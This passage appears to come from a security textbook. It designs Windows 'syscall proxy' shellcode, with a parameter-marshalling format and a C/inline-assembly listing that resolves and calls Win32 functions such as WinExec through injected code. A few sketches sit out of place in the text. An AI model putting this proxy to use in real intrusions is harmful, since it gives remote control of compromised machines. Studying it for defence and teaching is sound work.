Syscall Header
    DLLName
    FunctionName
    ParameterCount
    ...<some more flags>...
Parameter List Entry
    ...<some flags>...
    Size
    Data (if the parameter is "input" or "in/out")
An easy way to think about this is to work out what sorts of calls we will make and look at some parameter lists. We will definitely want to create and open files.
HANDLE CreateFile(
    LPCTSTR lpFileName,                         // pointer to name of the file
    DWORD dwDesiredAccess,                      // access (read-write) mode
    DWORD dwShareMode,                          // share mode
    LPSECURITY_ATTRIBUTES lpSecurityAttributes, // pointer to security attributes
    DWORD dwCreationDisposition,                // how to create
    DWORD dwFlagsAndAttributes,                 // file attributes
    HANDLE hTemplateFile                        // handle to file with attributes to copy
);
We have a pointer to a null-terminated string (which can be ASCII or Unicode) followed by a literal DWORD. This gives us our first design challenge: we must differentiate between literals (things) and references (pointers to things). So let's add a flag to make the distinction between pointers and literals. The flag we'll be using is IS_PTR. If this flag is set, the parameter should be passed to the function as a pointer to data rather than a literal. This means that we push the address of the data onto the stack before calling the function rather than pushing the data itself.
We can assume that we will pass the length of each parameter in the parameter list entry as well; that way, we can pass structures as input, as we do with the lpSecurityAttributes parameter.
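As a rough sketch of what one parameter list entry might look like on the wire, the code below writes a flag byte, a 4-byte size, and then the data. The exact field widths, the little-endian byte order, and the helper names put_u32_le and encode_entry are assumptions made for illustration; only the IS_PTR flag and the idea of carrying a size with each entry come from the text.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IS_PTR 0x01 /* parameter is passed as a pointer to the data */

/* Hypothetical helper: store a 32-bit value least-significant byte first. */
static void put_u32_le(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Hypothetical helper: write one entry as flags, size, data.
   Returns the number of bytes written, or 0 if the entry does not fit. */
size_t encode_entry(unsigned char *out, size_t out_len, unsigned char flags,
                    const void *data, uint32_t size)
{
    assert(out != NULL && data != NULL);
    if (out_len < 5 || size > out_len - 5)
        return 0;
    out[0] = flags;             /* 1 byte of flags */
    put_u32_le(out + 1, size);  /* 4 bytes of size */
    memcpy(out + 5, data, size);/* the literal, string, or structure */
    return (size_t)size + 5;
}
```

A literal DWORD would be encoded with no IS_PTR flag and a size of 4, while a file name or a SECURITY_ATTRIBUTES structure would be encoded with IS_PTR and its own length.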
So far we're passing a ptr flag and a data size in addition to the data, and we can already call CreateFile. There is a slight complication, however; we should probably handle the return code in some manner. Maybe we should have a special parameter list entry that tells us how to handle the returned data.
The return code for CreateFile is a HANDLE (an unsigned 4-byte integer), which means it is a thing rather than a pointer to a thing. But there's a problem here: we're specifying all the parameters to the function as input parameters and only the return value as an output parameter, which means we can never return any data except in the return code to a function.
We can solve this by creating two more parameter list entry flags:
IS_IN : The parameter is passed as input to the function.
IS_OUT : The parameter holds data returned from the function.
The two flags would also cover a situation in which we had a value that was both input to and output from a function, such as the lpcbData parameter in the following prototype.
LONG RegQueryValueEx(
    HKEY hKey,           // handle to key to query
    LPTSTR lpValueName,  // address of name of value to query
    LPDWORD lpReserved,  // reserved
    LPDWORD lpType,      // address of buffer for value type
    LPBYTE lpData,       // address of data buffer
    LPDWORD lpcbData     // address of data buffer size
);
This is the Win32 API function used to retrieve data from a key in the Windows registry. On input, the lpcbData parameter points to a DWORD that contains the length of the data buffer that the value should be read into. On output, it contains the length of the data that was copied into the buffer.
So, we do a quick check of some other prototypes.
BOOL ReadFile(
    HANDLE hFile,                // handle of file to read
    LPVOID lpBuffer,             // pointer to buffer that receives data
    DWORD nNumberOfBytesToRead,  // number of bytes to read
    LPDWORD lpNumberOfBytesRead, // pointer to number of bytes read
    LPOVERLAPPED lpOverlapped    // pointer to structure for data
);
We can handle that: we can specify an output buffer of arbitrary size, and none of the other parameters give us any problems.
A useful consequence of the way that we're bundling up our parameters is that we don't need to send 1000 bytes of input buffer over the wire when we call ReadFile. We just say that we have an IS_OUT parameter whose size is 1000 bytes, so we send 5 bytes to read 1000, rather than sending 1005 bytes.
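The arithmetic behind that saving can be sketched as follows, assuming each entry has a 5-byte header (one flag byte plus a 4-byte size) and that data bytes travel in the request only for IS_IN entries and in the reply only for IS_OUT entries. The flag values and the function names request_bytes and reply_bytes are illustrative assumptions.

```c
#include <assert.h>
#include <stdint.h>

#define IS_PTR 0x01
#define IS_IN  0x02
#define IS_OUT 0x04

#define ENTRY_HEADER 5u /* assumed: 1 flag byte + 4-byte size */

/* Bytes one parameter entry occupies in the request sent to the proxy. */
uint32_t request_bytes(unsigned char flags, uint32_t size)
{
    assert(size <= UINT32_MAX - ENTRY_HEADER); /* avoid wrap-around */
    return ENTRY_HEADER + ((flags & IS_IN) ? size : 0u);
}

/* Bytes of data the proxy sends back for one parameter entry. */
uint32_t reply_bytes(unsigned char flags, uint32_t size)
{
    return (flags & IS_OUT) ? size : 0u;
}
```

With these rules, a 1000-byte ReadFile buffer marked IS_PTR | IS_OUT costs 5 bytes in the request and 1000 in the reply, whereas an in/out DWORD such as lpcbData costs 9 bytes in the request and 4 in the reply.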
We must look long and hard to find a function we can't call using this mechanism. One problem we might have is with functions that allocate buffers and return pointers to the buffers that they allocated. For example, say we have a function like this:
MyStruct *GetMyStructure();
We would handle this at the moment by specifying that the return value is IS_PTR and IS_OUT and has size sizeof(struct MyStruct), which would get us the data in the returned MyStruct, but then we wouldn't have the address of the structure, so we couldn't free() it.
So, let's kludge the data we send back for the return value so that when we return a pointer type we return the literal value as well. In this way, we'll always reserve an extra 4 bytes for the literal return code, whether the return value is a literal or a pointer.
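One way this kludge might look in practice is sketched below: the reply for the return value always starts with the 4-byte literal (the handle, status code, or raw pointer value on a 32-bit target), and the pointed-to data follows only when the return value is flagged IS_PTR. The reply layout and the names pack_return and put_u32_le are assumptions for illustration, not part of the original design.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IS_PTR 0x01

/* Hypothetical helper: store a 32-bit value least-significant byte first. */
static void put_u32_le(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Pack the return value: 4 bytes of literal first, then (for pointer
   returns) 'size' bytes copied from the pointee.
   Returns bytes written, or 0 if the buffer is too small. */
size_t pack_return(unsigned char *out, size_t out_len, unsigned char flags,
                   uint32_t literal, const void *pointee, uint32_t size)
{
    assert(out != NULL);
    if (out_len < 4)
        return 0;
    put_u32_le(out, literal); /* always present, even for pointer returns */
    if (!(flags & IS_PTR))
        return 4;
    if (pointee == NULL || size > out_len - 4)
        return 0;
    memcpy(out + 4, pointee, size);
    return (size_t)size + 4;
}
```

The caller then has both the contents of the returned structure and the remote address it lives at, which it can pass back in a later call to free().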
That solution handles most of the cases, but we still have a few remaining. Consider the following:
char *asctime( const struct tm *timeptr );
The asctime() function returns a null-terminated string that occupies 26 bytes (24 characters of date and time, a newline, and the terminating null). We could kludge this as well by requiring that we specify a return size for any returned null-terminated string buffers. But that's not very efficient in terms of bandwidth, so let's add a null-terminated flag, IS_SZ (the data is a pointer to a null-terminated buffer), and also a double-null-terminated flag, IS_SZZ (the data is a pointer to a buffer terminated by two null bytes, for example, a Unicode string).
We need to lay out our proxy shellcode as follows:
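A minimal sketch of how a proxy might measure such buffers before sending them back is shown here. It assumes that IS_SZZ data is scanned in aligned 2-byte units (as for a UTF-16 string), so that a zero high byte followed by a zero low byte of the next character is not mistaken for the terminator; that scanning rule, the max bound, and the name terminated_len are assumptions for illustration.

```c
#include <assert.h>
#include <stddef.h>

#define IS_SZ  0x08 /* terminated by one null byte */
#define IS_SZZ 0x10 /* terminated by two null bytes */

/* Return the number of bytes to send, terminator included, or 0 if no
   terminator is found within 'max' bytes or no string flag is set. */
size_t terminated_len(const unsigned char *buf, size_t max,
                      unsigned char flags)
{
    size_t i;

    assert(buf != NULL);
    if (flags & IS_SZZ) {
        /* step two bytes at a time so we only match an aligned 16-bit zero */
        for (i = 0; i + 1 < max; i += 2)
            if (buf[i] == 0 && buf[i + 1] == 0)
                return i + 2;
        return 0;
    }
    if (flags & IS_SZ) {
        for (i = 0; i < max; i++)
            if (buf[i] == 0)
                return i + 1;
        return 0;
    }
    return 0;
}
```

The proxy then sends back only as many bytes as the string actually uses, instead of a fixed worst-case size.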
Get name of DLL containing function
Get name of function
Get number of parameters
Get amount of data we have to reserve for output parameters
Get function flags (calling convention, etc.)
Get parameters:
    Get parameter flags (ptr, in, out, sz, szz)
    Get parameter size
    (if in or inout) Get parameter data
    If not ptr, push parameter value
    If ptr, push pointer to data
    Decrement parameter count; if more parameters, get another parameter
Call function
Return 'out' data
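The steps above can be sketched in portable C as a parser that walks a request and records what the proxy would push for each parameter, without actually calling anything. This is an illustration only: it assumes little-endian 4-byte header fields in the order listed, a 5-byte entry header, 4-byte literals, and no data bytes for out-only entries; the struct and function names (struct call, struct arg, parse_call) and the 8-parameter limit are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IS_PTR 0x01
#define IS_IN  0x02
#define IS_OUT 0x04
#define MAX_ARGS 8 /* arbitrary limit for this sketch */

enum arg_kind { ARG_LITERAL, ARG_IN_PTR, ARG_OUT_PTR };

struct arg {
    enum arg_kind kind;
    uint32_t value; /* literal value, or offset into packet / out buffer */
    uint32_t size;
};

struct call {
    const char *dll, *fn;
    uint32_t nparams, out_size, fn_flags;
    struct arg args[MAX_ARGS];
};

static uint32_t get_u32_le(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Read a null-terminated name at *pos and advance past it. */
static const char *get_name(const unsigned char *pkt, size_t len, size_t *pos)
{
    const unsigned char *start = pkt + *pos;
    const unsigned char *nul = memchr(start, 0, len - *pos);
    if (nul == NULL)
        return NULL;
    *pos = (size_t)(nul - pkt) + 1;
    return (const char *)start;
}

/* Returns 0 on success, -1 if the packet is malformed. */
int parse_call(const unsigned char *pkt, size_t len, struct call *c)
{
    size_t pos = 0, out_pos = 0;
    uint32_t i;

    assert(pkt != NULL && c != NULL);
    if ((c->dll = get_name(pkt, len, &pos)) == NULL) return -1;
    if ((c->fn = get_name(pkt, len, &pos)) == NULL) return -1;
    if (len - pos < 12) return -1;
    c->nparams  = get_u32_le(pkt + pos);     /* number of parameters */
    c->out_size = get_u32_le(pkt + pos + 4); /* space for output data */
    c->fn_flags = get_u32_le(pkt + pos + 8); /* calling convention, etc. */
    pos += 12;
    if (c->nparams > MAX_ARGS) return -1;

    for (i = 0; i < c->nparams; i++) {
        struct arg *a = &c->args[i];
        unsigned char flags;

        if (len - pos < 5) return -1;
        flags = pkt[pos];
        a->size = get_u32_le(pkt + pos + 1);
        pos += 5;
        if (!(flags & IS_PTR)) {            /* push the value itself */
            if (a->size != 4 || len - pos < 4) return -1;
            a->kind = ARG_LITERAL;
            a->value = get_u32_le(pkt + pos);
            pos += 4;
        } else if (flags & IS_IN) {         /* push pointer into the packet */
            if (a->size > len - pos) return -1;
            a->kind = ARG_IN_PTR;
            a->value = (uint32_t)pos;
            pos += a->size;
        } else {                            /* push pointer into out buffer */
            if (a->size > c->out_size - out_pos) return -1;
            a->kind = ARG_OUT_PTR;
            a->value = (uint32_t)out_pos;
            out_pos += a->size;
        }
    }
    return 0;
}
```

A real proxy would push each recorded value or address onto the stack in the same order and then call the resolved function; recording them in an array just makes the walk easy to inspect.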
We've now got a generic design for a shellcode proxy that can deal with pretty much the entire Win32 API. The upside to our mechanism is that we handle returned data quite well, and we conserve bandwidth by having the in/out concept. The downside is that we must specify the prototype for every function that we want to call, in an IDL-type format (which actually isn't very difficult, because you'll probably end up calling only about 40 or 50 functions).
The following code shows what the slightly cut-down proxy section of the shellcode looks like. The interesting part is AsmDemarshallAndCall. We're manually setting up most of what our exploit will do for us: getting the addresses of LoadLibrary and GetProcAddress and setting ebx to point to the beginning of the received data stream.
// rsc.c
// Simple windows remote system call mechanism
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Write one parameter list entry: 1 flag byte, 4-byte size, then the data.
int Marshall( unsigned char flags, unsigned size, unsigned char *data,
              unsigned char *out, unsigned out_len )
{
    out[0] = flags;
    *((unsigned *)(&(out[1]))) = size;
    memcpy( &(out[5]), data, size );
    return size + 5;
}

////////////////////////////
// Parameter Flags /////////
////////////////////////////
// this thing is a pointer to a thing, rather than the thing itself
#define IS_PTR 0x01
// everything is either in, out or in | out
#define IS_IN 0x02
#define IS_OUT 0x04
// null terminated data
#define IS_SZ 0x08
// null short terminated data (e.g. unicode string)
#define IS_SZZ 0x10

////////////////////////////
// Function Flags //////////
////////////////////////////
// function is __cdecl (default is __stdcall)
#define FN_CDECL 0x01

int AsmDemarshallAndCall( unsigned char *buff, void *loadlib, void *getproc )
{
    // params:
    // ebp: dllname
    // +4 : fnname
    // +8 : num_params
    // +12 : out_param_size
    // +16 : function_flags
    // +20 : params_so_far
    // +24 : loadlibrary
    // +28 : getprocaddress
    // +32 : address of out data buffer
    _asm
    {
        // set up params - this is a little complicated
        // due to the fact we're calling a function with inline asm
        push ebp
        sub esp, 0x100
        mov ebp, esp
        mov ebx, dword ptr[ebp+0x158];   // buff
        mov dword ptr [ebp + 12], 0;
        mov eax, dword ptr [ebp+0x15c];  // loadlib
        mov dword ptr[ebp + 24], eax;
        mov eax, dword ptr [ebp+0x160];  // getproc
        mov dword ptr[ebp + 28], eax;
        mov dword ptr [ebp], ebx;        // ebx = dllname
        sub esp, 0x800;                  // give ourselves some data space
        mov dword ptr[ebp + 32], esp;
        jmp start;

        // increment ebx until it points to a '0' byte
    skip_string:
        mov al, byte ptr [ebx];
        cmp al, 0;
        jz done_string;
        inc ebx;
        jmp skip_string;
    done_string:
        inc ebx;
        ret;

    start:
        // so skip the dll name
        call skip_string;
        // store function name
        mov dword ptr[ ebp + 4 ], ebx
        // skip the function name
        call skip_string;
        // store parameter count
        mov ecx, dword ptr [ebx]
        mov edx, ecx
        mov dword ptr[ ebp + 8 ], ecx
        // store out param size
        add ebx,4
        mov ecx, dword ptr [ebx]
        mov dword ptr[ ebp + 12 ], ecx
        // store function flags
        add ebx,4
        mov ecx, dword ptr [ebx]
        mov dword ptr[ ebp + 16 ], ecx
        add ebx,4

        // in this loop, edx holds the num parameters we have left to do.
    next_param:
        cmp edx, 0
        je call_proc
        mov cl, byte ptr[ ebx ];     // cl = flags
        inc ebx;
        mov eax, dword ptr[ ebx ];   // eax = size
        add ebx, 4;
        mov ch,cl;
        and cl, 1;                   // is it a pointer?
        jz not_ptr;
        mov cl,ch;
        // is it an 'in' or 'inout' pointer?
        and cl, 2;
        jnz is_in;
        // so it's an 'out'
        // get current data pointer
        mov ecx, dword ptr [ ebp + 32 ]
        push ecx
        // set our data pointer to end of data buffer
        add dword ptr [ ebp + 32 ], eax
        // this cut-down version also skips 'size' bytes in the packet
        add ebx, eax
        dec edx
        jmp next_param
    is_in:
        push ebx
        // arg is 'in' or 'inout'
        // this implies that the data is contained in the received packet
        add ebx, eax
        dec edx
        jmp next_param
    not_ptr:
        mov eax, dword ptr[ ebx ];
        push eax;
        add ebx, 4
        dec edx
        jmp next_param;

    call_proc:
        // args are now set up. let's call...
        mov eax, dword ptr[ ebp ];
        push eax;
        mov eax, dword ptr[ ebp + 24 ];
        call eax;                    // this is loadlibrary
        mov ebx, eax;
        mov eax, dword ptr[ ebp + 4 ];
        push eax;
        push ebx;
        mov eax, dword ptr[ ebp + 28 ];
        call eax;                    // this is getprocaddress
        call eax;                    // this is our function call
        // now we tidy up
        add esp, 0x800;
        add esp, 0x100;
        pop ebp
    }
    return 1;
}

int main( int argc, char *argv[] )
{
    unsigned char buff[ 256 ];
    unsigned char *psz;
    DWORD freq = 1234;
    DWORD dur = 1234;
    DWORD show = 0;
    HANDLE hk32;
    void *loadlib, *getproc;
    // backslash escaped so the path is not read as a form feed
    char *cmd = "cmd /c dir > c:\\foo.txt";

    psz = buff;
    strcpy( (char *)psz, "kernel32.dll" );
    psz += strlen( (char *)psz ) + 1;
    strcpy( (char *)psz, "WinExec" );
    psz += strlen( (char *)psz ) + 1;
    *((unsigned *)(psz)) = 2;                  // parameter count
    psz += 4;
    *((unsigned *)(psz)) = strlen( cmd ) + 1;  // out param size
    psz += 4;
    // set fn_flags
    *((unsigned *)(psz)) = 0;
    psz += 4;
    // parameters are marshalled in push order (last argument first)
    psz += Marshall( IS_IN, sizeof( DWORD ), (unsigned char *)&show,
                     psz, sizeof( buff ) );
    psz += Marshall( IS_PTR | IS_IN, strlen( cmd ) + 1, (unsigned char *)cmd,
                     psz, sizeof( buff ) );

    hk32 = LoadLibrary( "kernel32.dll" );
    loadlib = GetProcAddress( hk32, "LoadLibraryA" );
    getproc = GetProcAddress( hk32, "GetProcAddress" );
    AsmDemarshallAndCall( buff, loadlib, getproc );
    return 0;
}
As it stands, this example performs the somewhat less-than-exciting task of demarshalling and calling WinExec to create a file in the root of the C drive. But the sample works and is a demonstration of the demarshalling process. The core of the mechanism is a little over 128 bytes. Once you add in all the surrounding patch level independence and sockets code, you still have fewer than 500 bytes for the entire proxy.